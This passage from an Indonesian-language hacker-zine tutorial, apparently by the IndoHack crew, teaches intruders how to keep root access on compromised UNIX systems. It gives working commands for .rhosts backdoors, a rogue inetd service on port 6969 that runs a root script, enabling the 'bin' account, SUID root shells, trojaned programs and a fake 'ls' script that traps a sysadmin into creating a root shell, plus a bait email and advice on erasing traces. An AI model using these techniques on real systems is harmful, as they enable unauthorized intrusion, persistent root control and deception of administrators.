saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password
atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.

Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com
Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan
daftar target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam atau dua jam kemudian,
tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll
(coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).

Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun
kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campurtangan dari user lokal
untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke
alamat email tertentu.)

2. Backdoor
===========

Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi
untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang
sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor
memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak
jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak
terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah
backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang
sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem
dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih
kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu
ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian
besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.

Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses
root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap
selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak.
Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa
sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver,
dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX.
Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:

korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar -dalam contoh diatas user ganjaman
dari indohack2.ri.go.id - yang boleh mengakses account tanpa password), dan untuk masuk kembali ke
sistem dari account "ganjaman" di indohack2.ri.go.id :

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id 

poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file
/etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.
Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara
crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login
"bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang
akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih
sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri
file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,
namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak
penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau
/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan
mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah
entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan
merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja,
sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar
cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang
didefinisikan dalam "inetd":

root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >>
/etc/services
root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >>
/etc/inetd.conf
root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r

menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak
akan segera tampak. Penjelasan dari ketiga perintah diatas:

1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu
mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control
Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin
tidak akan begitu curiga dengan nama seperti itu.

2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima
koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini
hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya
kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi
perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan
memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).

3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan
(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat,
kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke
file .rhosts milik root. Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan
untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik
root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan
memberikan jalan masuk lewat belakang ke dalam sistem target (idih, kesannya kayak cerita-cerita porno
anal seks aja!). Sekarang kamu tinggal:

ganjaman@indohack2> telnet korban.lameisp.net.id 6969

nah, sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban
akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan
dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri
lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga,
sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal:

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

dan, BOOM!

korban# 

shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com,
bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent engin badannya " :) ).
Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu
emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu,
jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik,
serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang
jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r",
dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara
ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus
seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir
user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal
secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis
execv("/bin/sh", "sh", NULL);.

Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel kelas kacangan ini), kamu
bisa modifikasi daemon-daemon yang sedang berjalan untuk menerima perintah-perintah hasil karangan
kamu sendiri. Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah berhasil
memodifikasi program sendmail di server korban.com (PSM=Pukulan Sinar Matahari):

212@GG> telnet korban.com 25
Trying mesin.korban.com
Connected to mesin.korban.com.
Escape character is '^]'.
220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; [snip]
PSM_EXEC /bin/cp /bin/sh /tmp/elit
Done master!
PSM_EXEC /bin/chmod 4755 /tmp/elit
Done master!

Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan segala kerendahan hati
minta izin untuk berguru!

3 Trojan Horse
===============

Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya Trojan Horse hanya efektif
jika kamu betul-betul pintar menutupi suatu program atau jika sang sysadmin memang betul-betul tolol.
Pada prinsipnya, Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu membuat
sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan perintah untuk membuka akses di dalam
kode game kamu, sedemikian rupa sehingga saat sang sysadmin menjalankan program tersebut, tanpa
disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang hacker yang lihai menulis
skrip IRC, dan skrip IRC-nya kebetulan mempunyai banyak peminat. Beberapa 'lamers' mendownload skrip
tersebut tanpa menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan
akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)

4 Trapdoor
===========
Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun dalam artikel ini, 'Trapdoor'
diasumsikan sebagai cara yang bisa kita gunakan untuk menjebak (trap) sang sysadmin untuk memberikan
kita akses root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang paling gres,
atau sebuah sistem dimana hampir semua eksploit untuk mendapatkan root tidak berjalan sama sekali
(patched systems). Jangan putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang
sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu sudah berhari-hari mengoprek
sebuah target dengan menggunakan account dan password seorang user biasa hasil colongan lewat phf,
dan sayangnya tidak ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.

Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa mengelabui puluhan sysadmin
diluar sana.

Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir milik user yang accountnya
kamu 'pinjam'):

user1@korban> chmod 700 ~/.

Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu mengganti privilesenya ke root jika
beliau ingin memeriksa isi direktori ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang
bertugas untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan sang admin,
justru membuka satu (atau beberapa) kelemahan dalam sistem. Yang langsung terpikir olehmu, jelas,
perintah ls. Disinilah letak kelemahan UNIX dibanding uh, MS-DOS. Dalam UNIX, seorang sysadmin yang
baik selalu mengetik 'full pathname' dari program manapun yang dia jalankan (seperti /bin/ls atau
/usr/sbin/vi index.html), dan untuk tujuan kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan
dalam daftar search path. Jadi jika misalnya sang sysadmin melakukan:

root# pwd
/usr/home/staff/user1
root# ls

maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan dalam direktori
/usr/home/staff/user1 kita letakkan sebuah skrip bernama 'ls'? Heheheh cukup menarik, khan. Nah, sekarang
kita bisa buat sebuah skrip yang berisi:

#!/bin/sh
cp /bin/sh /tmp/vi-save-902887
chown root /tmp/vi-save-902887
chmod 4755 /tmp/vi-save-902887
rm ./ls
ls

simpan skrip tersebut di homedir user1, beri nama "ls" dan

user1@korban> chmod +x ls

sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk mengecek isi homedir user1.
Jika kamu kebetulan punya login/passwd untuk user2 di mesin yang sama, maka kamu bisa saja 'mengundang'
sang admin. Login sebagai user1, dan kirim imel

user1@korban> mail root@localhost
Subject: "Heheheh Kena garap dari belakang!"
Hello sysadmin tolol! Mesin kamu sudah kebobolan!
ttd,
God of All Hackers, Virus Researchers and Lame Mailbombers,
Phardera
.

Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir user1 (dengan perintah ls,
tentunya), dan tanpa disadari sang sysadmin telah menciptakan sebuah shell root di /tmp/vi-save-902887.
Dan, karena vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal menyenangkan dengannya.
Tinggal login sebagai user2 beberapa waktu kemudian, dan nikmati ketenangan pikiran lewat shell root!
Heheheh.

Penutup
=======

Begitu dulu, deh, penjelasan dari kami. Semoga ada gunannya untuk kalian semua. Nggak lupa iseng-iseng
nereakin seluruh kru IndoHack, hackerindo, underground, dan kecoak elektronik!